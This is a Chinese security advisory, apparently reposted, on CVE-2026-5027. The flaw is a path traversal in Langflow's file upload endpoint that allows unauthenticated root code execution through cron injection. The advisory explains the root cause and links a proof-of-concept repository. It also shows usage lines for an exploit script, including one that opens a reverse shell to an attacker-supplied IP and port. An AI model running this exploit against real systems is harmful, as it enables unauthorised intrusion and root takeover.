文章总结: Langflow1.8.4及更早版本存在路径遍历漏洞(CVE-2026-5027),攻击者可通过未授权访问的POST/api/v2/files接口写入任意文件。结合默认自动登录配置,可利用cron作业实现root权限远程代码执行。目前暂无官方补丁,建议用户关注安全更新并检查系统配置。 综合评分: 85 文章分类: 漏洞分析,WEB安全,渗透测试,安全工具,漏洞预警
CVE-2026-5027 – Langflow 路径遍历导致远程代码执行漏洞 (CVSS 8.8)
Ots安全
2026年4月3日 14:06 广东
威胁简报
恶意软件
漏洞攻击
描述
Langflow 1.8.4 及更早版本未对端点filename中的参数进行清理POST /api/v2/files。攻击者可以利用路径遍历序列(../)将文件写入文件系统上的任意位置。结合 Langflow 的默认自动登录配置,无需任何身份验证即可利用此漏洞,从而通过 cron 作业注入以 root 身份执行远程代码。
受影响版本
- 易受攻击版本: Langflow <= 1.8.4
- 已修复:撰写本文时暂无可用补丁。
- 默认配置:启用自动登录(未经身份验证的攻击)
- 咨询: Tenable TRA-2026-26
用法
# Proof of concept (writes test fileto /tmp/)
python3 exploit.py -t http://target:7860
# With credentials (if auto-login is disabled)
python3 exploit.py -t http://target:7860 -u admin -p password
# Reverse shell via cron job
python3 exploit.py -t http://target:7860 --lhost YOUR_IP --lport 4444
示例输出
根本原因
该upload_user_file()函数直接src/backend/base/langflow/api/v2/files.py将数据传递file.filename给存储服务,而没有进行任何清理。它LocalStorageService.save_file()使用 . 构造路径folder_path / file_name,但这并不能阻止目录遍历。
POC:
https://github.com/yahiahamza/CVE-2026-5027
END
公众号内容都来自国外平台-所有文章可通过点击阅读原文到达原文地址或参考地址
排版 编辑 | Ots 小安
采集 翻译 | Ots Ai牛马
公众号 | AnQuan7 (Ots安全)
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Ots安全 《CVE-2026-5027 – Langflow 路径遍历导致远程代码执行漏洞 (CVSS 8.8)》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论